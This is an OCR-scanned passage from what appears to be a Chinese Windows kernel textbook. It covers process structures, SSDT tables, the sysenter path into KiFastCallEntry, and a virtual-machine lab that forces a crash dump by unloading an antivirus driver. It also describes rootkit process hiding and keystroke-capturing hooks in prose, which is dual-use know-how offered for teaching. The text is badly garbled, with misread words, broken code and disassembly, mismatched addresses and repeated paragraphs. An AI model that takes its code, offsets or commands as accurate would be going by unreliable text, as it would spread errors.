指针 (Flink) 或 向 后 指针 (Blink) 遍 历 所 有 进程 信息 。ETHREAD 结构 体 保存 某 个 进程 中 所 
有 线程 的 信息 ,也 是 由 双向 循环 链表 (ThreadListHead) 的 形式 组 织 的 ,遍历 的 方法 和 进程 
一 样 (具体 参见 Undocumented Windows 2000 Secrets 一 书 )。Windows 提供 Ps API 
(Psapi. h 和 Psapi. lib) 和 ToolHelp APICTIHelp32. h) 等 接口 函数 查看 进程 状态 信息 (具体 
参见 (Windows 核心 编程 ) 一 书 ) 。 

伪装 和 隐藏 进程 是 木马 常用 的 方法 之 一 ,修改 进程 的 _EPROCESS 结构 体 中 的 
ImageFileName 的 值 或 将 该 进程 的 _EPROCESS 从 双向 循环 链表 中 断 开 (不 影响 进程 正常 
运行 ) ,是 RootKit 常见 的 方法 ,可 以 欺骗 Ps API 和 ToolHelp API 等 接口 函数 ,杀毒 软件 
一 般 不 使 用 这 些 接口 函数 ,而 是 加 载 驱 动 模块 进入 系统 内 核 , 从 系统 其 他 内 核 组 件 提取 进程 


SSDT 表 和 ShadowSSDT 表 , 它 们 相当 于 系统 内 部 Native API 的 指向 标 ,作用 就 是 告诉 系 
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11-3 进程 的 双向 循环 链表 


信息 ,通过 比较 _EPROCESS 结构 体 链表 ,来 发 现 隐藏 进程 ,不 同 的 杀毒 软件 发 现 隐藏 进程 
的 方法 不 尽 相 同 ,因此 采用 多 种 杀毒 软件 扫描 系统 ,更 有 利于 保障 系统 安全 。 

2) 系统 调用 

Windows API 是 对 于 整个 Windows 操作 系统 自身 的 程序 代码 之 外 的 应 用 程序 来 说 
的 ,而 系统 调用 是 Windows 内 核对 于 非 内 核 程序 代码 之 外 的 Windows 系统 程序 代码 来 说 
的 。 也 就 是 说 系统 调用 要 比 Windows API 低 一 个 层次 。 

当 软 件 需 要 完成 某 一 特定 任务 时 ,如 读 写 文件 , Windows API(ReadFile() 或 WriteFile()) 
并 不 真正 实现 实际 功能 ,而 真正 实现 的 代码 在 内 核 中 ,于 是 Windows API 发 出 系统 调用 的 
请 求 , 通 过 中 断 或 快速 系统 调用 机 制 , 代 码 执行 由 RING3 进入 RINGO 使 用 系统 调用 ,但 并 
不 是 所 有 的 API 都 需要 进入 内 核 去 完成 这 个 API 的 功能 。 

从 Pentium 开 系 列 开始 的 CPU 引入 了 快速 系统 调用 这 一 特性 ,增加 了 两 条 指令 
sysenter 和 sysexit(AMD CPU 中 的 指令 为 syscall 和 sysret) 。 这 一 机 制 的 实现 就 是 专门 用 
于 解决 操作 系统 的 系统 调用 的 性 能 问题 ,这 种 机 制 实现 的 控制 转移 比 中 断 系 统 要 快 很 多 , 因 
为 转移 的 目标 地 址 是 存放 在 MSR 寄存 器 内 ,而 中 断 实现 的 系统 调用 目标 地 址 存放 在 内 存 
中 的 IDT 中 ,所 以 能 提高 执行 速度 。 

KiFastCallEntry 是 RING3 经 sysenter 进入 内 核 后 的 第 一 个 必 经 之 地 。 基 本 处 理 流 
程 : 首先 KiFastCallEntry 判断 ServiceIndex 是 否 合法 ,车 合法 则 判断 应 使 用 哪 张 表 (SSDT 
还 是 ShadowSSDT) ,然后 从 表 中 取出 Native API 地 址 ,从 用 户 栈 复制 参数 到 内 核 栈 ,然后 
调用 服务 例 程 ,调用 完 之 后 再 做 一 点 准备 工作 ,然后 就 由 KiServiceExit 再 回 到 RING3 。 

【 例 11-1】 在 资源 管理 器 中 双击 “c:\1. txt”. W Notepad. exe 调用 读 函 数 ReadFile O 
(由 kernel32. dll 导出 ), 以 此 为 例 分 析 KiFastCallEntry。ReadFile() 使 用 方法 如 下 。 


HANDLEpf ile; // 文 件 句 柄 

pfile = CreateFile("c:\\1. txt", GENERIC_READ, 0, NULL, OPEN_EXISTING, // 打 开 文 件 
FILE_ATTRIBUTE_ NORMAL|FILE FLAG DELETE ON_CLOSE, NULL) ; 

DWORDfilesize = GetFileSize(pfile, NULL); // 获 取 文 件 大 小 

char * buffer = newchar[filesize+1]; // 分 配 缓冲 区 大 小 ,最 后 一 位 为 /0' 

ReadFile(pfile, buffer, filesize, &readsize, NULL) ; // 读 文件 内 容 到 buffer 


ReadFile() 函 数 的 调用 ,编译 器 在 用 户 代 码 里 会 生成 对 子 系统 DLL 的 ntdll 模块 的 
ZwReadFile() 函数 的 调用 ,图 11-4 所 示 为 调用 流程 。 


kernel32 ! ReadFile() 一 一- ntdll ! ZwReadFile() ~~~ ntdll ! KiFasSystemCall() 


sysenter 
ntdll ! KiFastSystemCallRet()| 


用 户 层 
内 核 层 
nt!KiServiceExit | 一 | nt!KiFastCallEntry() 返 回 | nt! KiFastCallEntry() 


w. nt ! NtReadFile() 


11-4 函数 调用 流程 


sysexit 


实践 教程 


系统 调用 也 就 是 从 RING3 一 RING0 一 RING3 的 过 程 。 另 外 Windows 系统 还 提供 一 
个 RING0—RING3—RING0 的 调用 机 制 , 这 就 是 未 公开 的 内 核 函 数 KeUserModeCallback 
的 作用 (所 谓 的 未 公开 是 指 微软 没有 公开 文档 说 明 , 导 出 该 函数 并 不 保证 将 来 不 修改 ) ,其 调 
用 过 程 如 下 。 

nt! KeUserModeCallback —> nt! KiCallUserMode — nt! KiServiceExit —> ntdll! KiUserCallbackDispatcher 

一 回调 函数 一 int2B — nt! KiCallbackReturn — nt!KeUserModeCallback( 调 用 后 ) 

系统 所 有 的 消息 钩子 回调 都 是 利用 KeUserModeCallback 完成 的 ,可 以 通过 挂钩 
KeUserModeCallback 用 来 过 滤 对 消息 钩子 的 调用 ,如 按键 消息 到 达 具 体 的 窗口 消息 队列 
之 前 会 调用 WH_KEYBOARD 钩子 函数 ,可 以 利用 此 类 钩子 截取 键盘 输入 。 另 外 DLL W 
人 进程 在 进入 RINGO 后 总 会 执行 到 这 个 内 核 函 数 ,而 DLL 注入 代码 的 加 载 正 是 依赖 此 函 
数 的 回调 机 制 得 以 实现 ,因此 可 以 利用 此 类 钩子 实现 反 DLL 注入 。 这 也 是 360 保险 箱 和 
QQ 计算 机 管家 的 原理 。 实 践 8 中 介绍 了 DLL 通过 SetWindowsHookEx 来 挂钩 全 局 消息 
钩子 , 当 拦截 KeUserModeCallback 后 并 设置 过 滤 机 制 即 可 阻止 这 类 的 DLL 注入 。 


5. 实践 操作 及 步骤 


D 启动 内 存 转 储 

右 击 “我 的 电脑 ”图标 ,选择 右键 子 菜单 “属性 "命令 ,打开 “系统 属性 ”对 话 框 ,选择 “高 
级 ”选项 卡 , 单 击 其 中 的 “启动 和 故障 恢复 ”下 的 “设置 "按钮 ,打开 如 图 11-5 所 示 的 对 话 框 。 

选择 “核心 内 存 转 储 ”, 转 储 文件 目录 为 
%SystemRoot%\ MEMORY. DMP。 其 中 ， P 
%SystemRoot% 是 环境 变量 即 c; \ Windows. BARFA O: 


ias? "| 
MEMORY. DMP 保存 系统 蓝屏 时 核心 内 存 的 | ema ==. 


快照 。 口 在 基 要 时 显示 履 夏 寺 天 8984 间 加) b 到 和 
2) 蓝屏 产生 及 分 析 
利用 XueTr. exe 工具 印 载 Hookport. sys 驱 PUHSSISXW3SHEWI 

动 来 产生 蓝屏 。Hookport. sys 是 360 安全 卫士 ea 

对 系统 进行 挂钩 操作 的 核心 模块 ,其 主要 功能 是 

对 SSDT 和 ShadowSSDT 安装 钓 子 函数 。 

Hookport. sys 只 提供 了 最 为 基本 的 过 滤 操 作 和 

桩 函数 ,本 身 并 没有 实现 策略 部 分 。 策 略 部 分 由 

驱动 360SelfProtection. sys 实现 ,并 通过 设备 扩 

展 进行 沟通 。 图 11-5 “启动 和 故障 恢复 ”对 话 框 
在 虚拟 机 中 启动 XueTr. exe, 该 工具 会 释放 

一 个 名 为 XueTr. sys 的 驱动 文件 (文件 属性 为 隐藏 ) ,并 把 它 加 载 到 系统 内 核 中 ,360 或 其 他 

杀毒 软件 会 弹出 警告 提示 框 ,选择 允许 加 载 ,XueTr. sys 加 载 入 内 核 后 随即 删除 XueTr. sys 

文件 ,并 显示 如 图 11-6 所 示 的 界面 ,选择 “驱动 模块 ?选项 卡 , 右 击 Hookport. sys, 在 弹出 的 

右键 快捷 菜单 中 选择 “ 务 载 驱 动 " 命 令 , 系统 立刻 就 会 蓝屏 ,并 进行 内 存 转 储 ,如 图 11-7 

所 示 。 
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系统 调用 也 就 是 从 RING3 一 RING0 一 RING3 的 过 程 。 另 外 Windows 系统 还 提供 一 
个 RING0—RING3—RING0 的 调用 机 制 , 这 就 是 未 公开 的 内 核 函 数 KeUserModeCallback 
的 作用 (所 谓 的 未 公开 是 指 微软 没有 公开 文档 说 明 , 导 出 该 函数 并 不 保证 将 来 不 修改 ) ,其 调 
用 过 程 如 下 。 
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钩子 , 当 拦截 KeUserModeCallback 后 并 设置 过 滤 机 制 即 可 阻止 这 类 的 DLL 注入 。 
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右 击 “我 的 电脑 ”图标 ,选择 右键 子 菜单 “属性 "命令 ,打开 “系统 属性 ”对 话 框 ,选择 “高 
级 ”选项 卡 , 单 击 其 中 的 “启动 和 故障 恢复 ”下 的 “设置 "按钮 ,打开 如 图 11-5 所 示 的 对 话 框 。 

选择 “核心 内 存 转 储 ”, 转 储 文件 目录 为 
%SystemRoot%\ MEMORY. DMP。 其 中 ， P 
%SystemRoot% 是 环境 变量 即 c; \ Windows. BARFA O: 
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动 来 产生 蓝屏 。Hookport. sys 是 360 安全 卫士 ea 

对 系统 进行 挂钩 操作 的 核心 模块 ,其 主要 功能 是 

对 SSDT 和 ShadowSSDT 安装 钓 子 函数 。 

Hookport. sys 只 提供 了 最 为 基本 的 过 滤 操 作 和 

桩 函数 ,本 身 并 没有 实现 策略 部 分 。 策 略 部 分 由 

驱动 360SelfProtection. sys 实现 ,并 通过 设备 扩 

展 进行 沟通 。 图 11-5 “启动 和 故障 恢复 ”对 话 框 
在 虚拟 机 中 启动 XueTr. exe, 该 工具 会 释放 

一 个 名 为 XueTr. sys 的 驱动 文件 (文件 属性 为 隐藏 ) ,并 把 它 加 载 到 系统 内 核 中 ,360 或 其 他 

杀毒 软件 会 弹出 警告 提示 框 ,选择 允许 加 载 ,XueTr. sys 加 载 入 内 核 后 随即 删除 XueTr. sys 

文件 ,并 显示 如 图 11-6 所 示 的 界面 ,选择 “驱动 模块 ?选项 卡 , 右 击 Hookport. sys, 在 弹出 的 

右键 快捷 菜单 中 选择 “ 务 载 驱 动 " 命 令 , 系统 立刻 就 会 蓝屏 ,并 进行 内 存 转 储 ,如 图 11-7 

所 示 。 
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由 图 11-7 可 以 看 出 ,该 系统 蓝屏 是 由 Hookport. sys 驱动 引起 的 。 
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图 11-6 XueTr 的 显示 界面 
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PERATIONS 


图 11-7 系统 蓝屏 及 内 存 转 储 


在 分 析 之 前 , 先 将 symbols 压缩 包 解 压 到 某 一 目录 下 如 下 盘 根 目 录 ,symbols 文件 下 包 


含 一 系列 pdb 符号 文件 ,内 存 转 储 文件 MEMORY. DMP H 
通过 pdb 符号 文件 翻译 ,如 将 8044c422 翻译 为 NtClose。 为 此 ,必须 先 
设置 系统 环境 变量 _NT_SYMBOL PATH 如 下 。 


作用 无 法 理解 , 需 3 


bh 包含 一 系列 数字 如 8044c422, 其 
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_NT_SYMBOL, PATH = symsrv * symsrv. dll * E:\symbols * http://msdl. microsoft. com/download/ symbols 


然后 就 可 以 分 析 MEMORY. DMP 文件 。 在 cmd 命令 终端 下 用 cd 命令 切换 到 i386kd 
.exe( 压 缩 包 “系统 调试 工具 . rar” 中 ,其 中 包含 3 个 DMP 文件 : WIN7. DMP 是 Windows 7 
系统 未 安装 360 软件 的 DMP 文件 ; WIN7_360. DMP 是 Windows 7 系统 安装 360 软件 后 
的 DMP 文 件 ; XP. DMP 是 Windows XP 系统 安装 360 软件 后 的 DMP 文件 ) 所 在 目录 , 输 
人 以 下 命令 行 “i386kd. exe -z c:\windows\memory. dmp” 则 显示 如 图 11-8 所 示 的 信息 。 


?ffd8BBc>。 Type “.hh dbgerr08i" for details 


图 11-8 MEMORY.DMP 分 析 界 面 


图 11-8 中 显示 的 部 分 信息 解释 如 下 

(1) Kernel Complete Dump File:Only kernel address space is available, 系 统 失败 时 设 
置 的 是 “内 核 转 储 ”, 内 核 地 址 空间 可 见 (32 fu # #£ > = 0x80000000 地 址 ) ,如 设 为 “完全 转 
储 ” 则 所 有 地 址 空间 可 见 (Full address space is available) 
符号 文件 所 在 的 目录 。 

(3) Windows XP Kernel Version. ,当前 系统 的 内 核 版 本 、 编 译 信息 等 。 

(4) Kernel base = 0x804d8000 ,表示 Windows XP 系统 的 内 核 模块 ntkrnlpa. exe 的 内 
存 加 载 地 址 ,PsLoadedModuleList = 0x80555140 表示 Windows XP 加 载 的 所 有 内 核 模块 
构成 的 链表 的 表 头 ,利用 它 可 以 枚 举 所 有 这 些 模块 的 信息 。 

在 kd 二 命令 行 输入 “lanalyze -v”, 回 车 后 ,显示 以 下 系统 栈 部 分 信息 。 


(2) Symbol search path is, 显 示 


STACK TEXT: 
b101eb84 8051dc8f00000050 f7455f81 00000008 nt!KeBugCheckEx + 0xlb 


b101ebe4 80541634 00000008 f7455f81 00000000 nt! MmAccessFault + 0x8e7 

b101ebe4 f7455f81 00000008 f7455f81 00000000 nt! KiTrap0E + 0xcc 

WARNING: Frame IP not in any known module. Following frames may be wrong. 

b101ec6c b101ed64 0013b1c0 e10ff1a8 b101ece4 < Unloaded Hookport. sys > + 0x4f81 + 
b101ed34 8053e738 0000010c 00000000 00000000 0xb101ed64 

b101ed34 7c92e4f4 0000010c 00000000 00000000 nt! KiFastCallEntry + 0xf8 

0013b1f0 00000000 00000000 00000000 00000000 0x7c92e4f4 


其 中 系统 执行 到 Hookport 十 0x4f81 指令 时 发 生 memory_corruption 内 存 错误 ,正常 情 


况 下 Hookport. sys 不 会 引发 蓝屏 ,如 果 被 手动 印 载 或 恶意 软件 卸载 则 会 蓝屏 ,一 般 正 常 的 
驱动 是 可 以 手动 印 载 的 。 也 就 说 Hookport. sys 可 以 防止 恶意 软件 印 载 。 


3) 内 核 结构 体 

查看 内 核 结构 体 的 常用 命令 如 下 。 

A) dt nt! _* : 查看 内 核 的 数据 结构 。 

(2) u: 反 编译 机 器 码 。 

Ou 一 from 记 从 地 址 二 from 记 开始 反 编译 8 个 机 器 码 。 

Q@u 二 from 二 一 to 二 反 编 译 一 from 二 到 一 to 二 之 间 的 所 有 机 器 码 。 

© u 不 提供 任何 参数 时 ,从 上 次 u 命令 停止 的 位 置 开 始 反 编 译 。 

(3) db.dw 和 dd: Dump Memory BYTEs .WORDs 和 DWORDs。 

O db: 将 指定 内 存 范围 里 的 数据 显示 为 两 个 部 分 ,左边 是 十 六 进 制 表示 (每 两 个 8 bit 


一 组 ) ,右边 是 对 应 的 ASCH 码 。 


@ dw 仅 按 照 十 六 进 制 显示 (16 bit 一 组 ) 。 

@ dd 仅 按照 十 六 进 制 显 示 (32 bit 一 组 ) 。 

(4) ln: 列 出 最 近 的 符号 。 

(D In 二 address 二 显示 二 address 二 指示 的 地 址 以 及 和 其 前 后 相 邻 地 址 的 符号 信息 。 

@ ln 二 symbol 二 将 符号 名 解析 为 与 其 对 应 的 虚拟 地 址 。 

输入 以 下 命令 ,可 以 查看 内 核 结构 体 的 具体 内 容 , 实 践 是 以 32 位 Windows 7 系统 


(ntkrnlpa. exe) 的 DMP 文件 为 例 ,读者 自行 比较 Windows XP, Windows 8 等 系统 的 不 同 之 


处 。 


i386kd. exe 显示 内 核 信 息 如 下 。 


Executable search path is: 

Windows 7 Kernel Version 7601 (Service Pack 1) UP Free x86 compatible 
Product: WinNt, suite: TerminalServer SingleUserTS 

Built by: 7601.17944.x86fre.win7spl_gdr.120830 — 0333 

Machine Name: 

Kernel base = 0x8421c000 PsLoadedModuleList = 0x843664d0 

Debug session time: Sat Jul 26 23:03:38.063 2014 (UTC + 8:00) 
System Uptime: 0 days 0:21:07.138 


其 中 ,Kernel base=0x8421c000 表示 Windows 7 系统 的 内 核 模块 ntkrnlpa. exe 的 内 存 


加 载 地 址 ,PsLoadedModuleList = 0x843664d0 表示 Windows 7 加 载 的 所 有 内 核 模块 构成 


的 链表 的 表 头 。 
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(1) dt nt! _EPROCESS: 进程 结构 体 。 


kd> dt nt!_EPROCESS 


+ 0x000 Pcb : _KPROCESS 

+ 0x098 ProcessLock : _EX_PUSH LOCK 

+ 0x0a0 CreateTime : _LARGE INTEGER 
+ 0x0a8 ExitTime : _LARGE_INTEGER 
+ 0x0b0 RundownProtect : _EX_RUNDOWN_REF 
+ 0x0b4 UniqueProcessId : Ptr32 Void 


+ 0x0b8 ActiveProcessLinks : _LIST ENTRY // 进 程 的 双向 循环 链表 成 员 变量 


+ 0x188 ThreadListHead : _LIST_ENTRY — // 指 向 当前 进程 中 线程 的 双向 循环 链表 头 


用 dt 可 以 继续 查看 结构 体 KPROCESS、EX_PUSH_LOCK、LARGE_INTEGER、 
_LIST_ENTRY 等 。 如 “dt _LIST_ENTRY” 显 示 如 下 信息 。 


ntdll!_LIST ENTRY 


+ 0x000 Flink : Ptr32 _LIST_ENTRY // 循 环 链表 向 前 指针 
+ 0x004 Blink : Ptr32 _LIST_ENTRY // 循 环 链表 向 后 指针 


进程 结构 体 的 C 语言 中 的 定义 如 下 。 


typedef struct _EPROCESS { 
KPROCESS Pcb; // 内 核 进程 块 
EX_PUSH_LOCK ProcessLock; //LARGE_INTEGER CreateTime; LARGE INTEGER ExitTime; 
EX_RUNDOWN_REF RundownProtect; PVOID UniqueProcessId; 
LIST_ENTRY ActiveProcessLinks; 


}EPROCESS, * PEPROCESS; 


(2) dt nt! _ETHREAD: 线程 结构 体 。 


kd> dt nt!_ETHREAD 


+ 0x000 Tcb : _KTHREAD 

+ 0x200 CreateTime : _LARGE_INTEGER 
+ 0x208 ExitTime : _LARGE_INTEGER 
+ 0x208 KeyedWaitChain : _LIST ENTRY 

+ 0x210 ExitStatus : Int4B 

+ 0x214 PostBlockList : _LIST ENTRY 


+ 0x214 ForwardLinkShadow : Ptr32 Void 


+ 0x268 ThreadListEntry : _LIST ENTRY // 线 程 的 双向 循环 链表 成 员 变量 表 头 
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(1) dt nt! _EPROCESS: 进程 结构 体 。 


kd> dt nt!_EPROCESS 


+ 0x000 Pcb : _KPROCESS 

+ 0x098 ProcessLock : _EX_PUSH LOCK 

+ 0x0a0 CreateTime : _LARGE INTEGER 
+ 0x0a8 ExitTime : _LARGE_INTEGER 
+ 0x0b0 RundownProtect : _EX_RUNDOWN_REF 
+ 0x0b4 UniqueProcessId : Ptr32 Void 


+ 0x0b8 ActiveProcessLinks : _LIST ENTRY // 进 程 的 双向 循环 链表 成 员 变量 


+ 0x188 ThreadListHead : _LIST_ENTRY — // 指 向 当前 进程 中 线程 的 双向 循环 链表 头 


用 dt 可 以 继续 查看 结构 体 KPROCESS、EX_PUSH_LOCK、LARGE_INTEGER、 
_LIST_ENTRY 等 。 如 “dt _LIST_ENTRY” 显 示 如 下 信息 。 


ntdll!_LIST ENTRY 


+ 0x000 Flink : Ptr32 _LIST_ENTRY // 循 环 链表 向 前 指针 
+ 0x004 Blink : Ptr32 _LIST_ENTRY // 循 环 链表 向 后 指针 


进程 结构 体 的 C 语言 中 的 定义 如 下 。 


typedef struct _EPROCESS { 
KPROCESS Pcb; // 内 核 进程 块 
EX_PUSH_LOCK ProcessLock; //LARGE_INTEGER CreateTime; LARGE INTEGER ExitTime; 
EX_RUNDOWN_REF RundownProtect; PVOID UniqueProcessId; 
LIST_ENTRY ActiveProcessLinks; 


}EPROCESS, * PEPROCESS; 


(2) dt nt! _ETHREAD: 线程 结构 体 。 


kd> dt nt!_ETHREAD 


+ 0x000 Tcb : _KTHREAD 

+ 0x200 CreateTime : _LARGE_INTEGER 
+ 0x208 ExitTime : _LARGE_INTEGER 
+ 0x208 KeyedWaitChain : _LIST ENTRY 

+ 0x210 ExitStatus : Int4B 

+ 0x214 PostBlockList : _LIST ENTRY 


+ 0x214 ForwardLinkShadow : Ptr32 Void 


+ 0x268 ThreadListEntry : _LIST ENTRY // 线 程 的 双向 循环 链表 成 员 变量 表 头 


(3) SSDT 表 和 ShadowSSDT 表 。 


服务 描述 符 表 的 结构 的 定义 如 下 。 
typedef struct _SERVICE DESCRIPTOR TABLE { 
SYSTEM_SERVICE_TABLE ntoskrn1; //ntoskrnl. exe 
导出 符号 : KeServiceDescriptorTable 
SYSTEM_SERVICE_TABLE win32k; // win32k. sys, 
导出 符号 : KeServiceDescriptorTableShadow 
SYSTEM SERVICE TABLE Table3; // 未 用 
SYSTEM_SERVICE TABLE Table4; // 未 用 


]SYSTEM_DESCRIPTOR TABLE, * PSYSTEM DESCRIPTOR TABLE, 
## PPSYSTEM_DESCRIPTOR_ TABLE; 


内 核 文件 ntoskrnl. exe 导出 了 一 个 指针 (符号 为 KeServiceDescriptorTable) 指 向 其 主 
服务 描述 符 表 (Main SDT, SSDT)。 内 核 还 维护 了 一 个 替代 的 SDT, 其 名 称 为 
KeServiceDescriptorTableShadow (ShadowSSDT)。 服 务 描 述 符 表 中 的 结构 体 成 员 
SYSTEM_SERVICE_TABLE 定义 如 下 。 


typedef struct _SYSTEM SERVICE TABLE { 


PNTPROC ServiceTable; // 函 数 指针 构成 的 数组 
导出 符号 : KiServiceTable/W32pServiceTable 
PDOWRD CounterTable; // 每 个 函数 的 使 用 计数 器 
DWORD ServiceLimit; // 函 数 指针 的 个 数 
PBYTE ArgumentTable; // 所 需 参 数 在 调用 者 的 堆栈 中 的 字 节 数 


导出 符号 : KiArgumentTable/W32pArgumentTable 
} SYSTEM_SERVICE TABLE, x PSYSTEM_SERVICE TABLE, xx PPSYSTEM_SERVICE_ TABLE; 


O 输入 以 下 指令 可 以 查询 SSDT 表 和 ShadowSSDT 表 的 存储 地 址 和 导出 符号 ,如 
表 11-1 所 示 。 


Kd > del keserviceDescriptortable 


表 11-1 SSDT 表 和 ShadowSSDT 表 内 存 地 址 和 导出 符号 


内 存 地 址 内 存 数 据 ( 十 六 进 制 显示 ) 
84386b00 8429a4dc 00000000 00000191 8429ab24 
84386b10 00000000 00000000 00000000 00000000 
84386b20 8454a4f2 842f9627 00000000 02f90838 
84386b30 00000bb8 00000011 e57a42bd d6bf94d5 
84386b40 8429a4dc 00000000 00000191 8429ab24 
84386b50 83eac000 00000000 00000339 83ead02c 
84386b60 00000100 00000000 00000000 84386b68 


其 中 ,十 六 进 制 0x191 显示 SSDT 表 的 函数 指针 个 数 为 401。0x339 显示 ShadowSSDT 
表 的 函数 指针 个 数 为 825 。 
kd > ln 84386b00 


(84386b00) — nt!KeServiceDescriptorTable // 符 号 信息 
kd> ln 8429a4dc 
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(8429a4dc) — nt!KiServiceTable 

kd > ln 8429ab24 

(8429ab24) nt! KiArgumentTable 

kd > ln 84386b40 

(84386b40) nt! KeServiceDescriptorTableShadow 
kd > ln 83eac000 

(83eac000) win32k! W32pServiceTable 

kd> 1n 83ead02c 

(83ead02c) win32k! W32pArgumentTable 


O 输入 以 下 指令 查看 SSDT 表 的 信息 如 表 11-2 所 示 。 


kd> dd KiServiceTable 
表 11-2 SSDT 表 的 信息 
内 存 地 址 内 存 数据 (SSDT 中 函数 的 地 址 ) 
8429a4dc 84496e78842ddb1584426c84842418ba 
8429a4ec 8449874f8431a3b684508f3b84508f84 
8429a4fc 8441b4d3845227a6845239fb84411cab 
8429a50c 844a2d8d844fbc998444ebe08441e7e8 


输入 指令 “dd 8429a4dc” 也 可 以 输出 一 样 的 内 容 。 


kd> ln 844a2d8d 
(844a2d8d) nt!NtAdjustPrivilegesToken // 提 权 函 数 内 存 加 载 地 址 


函数 内 存 加 载 地 址 = 内 核 模块 ntkrnlpa. exe 的 内 存 加 载 地 址 + 
ntkrnlpa. exe 文件 中 函数 的 入 口 偏 移 地 址 


用 Dependency Walker 打开 ntkrnlpa. exe 文件 ,找到 NtAdjustPrivilegesToken 的 入 口 
偏 移 地 址 (Entry Point)0x00286D8D 。 


1070 (0x042E) | 1059 (0x0423)| NtAddAtom 0x001FF4D3 
E | 1071 (0x042F) | 1060 (0x0424) | NtAdjustprivilegesToken 0x00286D8D | 
E |1072 (0x0430)| 1061 (0x0425)  NtAllocateLocallyUniqueld 0x002027E8 | 


图 11-9 ntkrnlpa. exe 的 导出 函数 
则 : 0x844a2d8d( 函 数 地 址 ) 二 0x8421c000(Kernel base) + 0x00286D8D 


kd > db KiArgumentTable 

8429ab24 18 20 2c 2c 40 2c 40 44 - Oc 08 08 18 18 08 04 04 . 
8429ab34 Oc Oc 10 18 24 Oc 2c 0c - 18 10 0c Oc Oc Oc Oc 0c 
8429ab44 08 Oc 18 18 14 18 Oc 20 - 10 08 08 08 Oc 08 Oc 0c 
8429ab54 08 04 04 Oc 08 08 08 08 - Oc 04 04 20 08 10 0c 20 


第 一 个 0x18 表示 SSDT 表 中 的 第 一 个 函数 的 参数 有 24 个 字 节 。 
© 查看 ShadowSSDT 表 的 信息 。 
输入 指令 *kd> dd W32pServiceTable” 可 查看 ShadowSSDT 表 的 信息 如 表 11-3 所 示 。 


Š 11-3 ShadowSSDT 表 的 信息 


内 存 地 址 内 存 数 据 (SSDT 中 函数 的 地 址 ) 
83eac000 83e37dbe 83e4fdfc 83ca7252 83e46ba6 
83eac010 83e5159f 83e385db 83e3866f 83d5f94b 
83eac020 83e50dd5 83d1370b 83d13628 83e5309d 
83eac030 83e512c6 83e4fe70 83d5472b 83e51219 


kd> ln83d5f94b 
(83e37dbe) win32k!NtGdiAlphaBlend // 设 置 位 图 的 透明 程度 
kd > db W32pArgumentTable 

83ead02c 04 04 18 10 14 08 Oc 30-18 00 04 28 08 04 2c 04 
83ead03c 20 04 08 08 18 10 Oc 04-10 08 14 14 04 04 20 0c 
83ead04c 04 18 2c 24 10 04 Oc 04-14 08 Oc 10 10 18 18 08 
83ead05c 10 04 04 04 lc 04 Oc 0c-08 08 Oc 08 08 08 04 20 


4) KiFastCallEntry 分 析 
以 前 面 的 图 11-4 所 示 的 函数 调用 流程 为 例 来 分 析 KiFastCallEntry。 
d) 输入 指令 : kd> u ntdll1ZwReadFile。 


地 址 机 器 码 汇编 指令 
77a262b8 b811010000 mov eax,111h; // 系 统 服务 例 程 号 
77a262bd ba0003fe7f mov edx, offset SharedUserDatal SystemCallStub(7ffe0300) 


;// 取 得 KiFastCallEntry() stub 函数 
77a262c2 ff12 call dword ptr [edx] 
77a262c4  c22400 ret 24h 


ZwReadFile () 是 一 个 stub 函数 ,作用 只 是 转发 ,因此 很 简单 。 其 中 0x111( 十 进 制 
273) 是 NtReadFile 函数 在 SSDT 表 中 的 索引 号 (服务 号 ) ,在 32 位 系统 中 函数 地 址 占 4 个 
字 节 ,因此 NtReadFile 函数 地 址 的 存储 地 址 计算 如 下 。 


0x8429a4dc(nt!KiServiceTable) + 4 * 0x111 = 0x8429A920 


验证 方法 如 下 。 
O 输入 指令 *kd>dd ”8429A920”, 找 到 内 存 地 址 0x8429A920 的 内 存 数据 ,如 表 11-4 
所 示 。 
表 11-4 内存 地 址 与 内 存 数据 


内 存 地 址 内 存 数据 (SSDT 中 函数 的 地 址 ) 
8429A920 8447fec8843b5750 8451099e 844e7b79 
8429a930 8447da68 8450ff66 843c5934 843c71d0 


实践 教程 


0x8447fec8 即 是 存储 在 内 存 地 址 0x8429A920 上 的 函数 地 址 。 
© 输入 命令 “ln 8447fec8”, 输 出 “(8447fec8)nt!NtReadFile”。 
ZwWiriteFile() 函 数 从 一 个 叫 UserSharedData 结构 区 域 里 得 到 KiFastSystemCall( O 函 


数 地 址 值 。 在 User 层 和 Kernel 层 分 别 定义 了 一 个 _KUSER_SHARED_DATA 结构 区 域 
(UserSharedData) ,用 于 User 层 和 Kernel 层 共享 某 些 数据 ,在 sysenter 快速 切入 机 制 里 就 


使 用 


了 这 个 区 域 。User 层 地 址 为 0x7ffe0000; Kernnel 层 地 址 为 0xffdf0000。 用 “dt 


_KUSER_SHARED _DATA” 在 偏 移 地 址 为 0x300 处 的 是 SystemCall, 而 0x304 是 


Syst 


emCallReturn, 


(2) 输入 指令 : kd> u ntdll! KiFastSystemCall。 


地 址 机 器 码 汇编 指令 
77a27090 8bd4 mov edx, esp 
77a27092 0f34 sysenter 


ntdll! KiFastSystemCall 使 用 sysenter 指令 快速 切 和 人 到 内 核 的 nt!KiFastCallEntry() 代 


码 里 。 


(3) 输入 指令 : kd> u nt!KiFastCallEntry 十 0xd7。 
842598a733c9 Xorecx, eCX 
842598a9 8b570cmovedx, dword ptr [edi + 0Ch]; //edi 指向 SSDT 或 ShadowSSDT 
842598ac 8b3f mov edi, dword ptr [edi] 
842598ae 8a0c10 mov cl,byte ptr [eax+ edx]; //cl 得 到 参数 的 长 度 , 即 参数 个 数 * 4 
842598b1 8b1487 mov edx,dword ptr [edi + eax * 4]; 

//eax 是 服务 号 ,然后 ebx 得 到 服务 函数 地 址 
842528b4 2bel Sub esp,ecx; //ecx 得 到 参数 的 总 长 度 , 这 里 是 开辟 栈 空 间 
842528b6 cle902 shr ecx,2 // 除 以 4, 得 参数 个 数 
842598b9 Bbfc mov edi,esp 


842598bb 3b354c683884 cmp esi,dword ptr [nt!MmUserProbeAddress ] 

842528bb 3b354cf83784 cmp esi,dword ptr [nt!MmUserProbeAddress (8437f84c)] 
842528c1 0f832e020000 jae nt!KiSystemCallExit2 + 0xa5 (84252af5) 

842528c7 f3a5 rep movs dword ptr es:[edi],dword ptr [esi] 

842528c9 f6456c01 test byte ptr [ebp + 6Ch],1 

842528cd 7416je nt! KiFastCallEntry + 0x115 (842528e5) // 跳 转 


(4) 输入 指令 : kd> u 842528e5。 


nt! KiFastCallEntry + 0x115: 

842528e5 8bda mov ebx, edx 

842528e7 f60588c6348440 test byte ptr [nt!PerfGlobalGroupMask + 0x8 (8434c688) 
],40h 


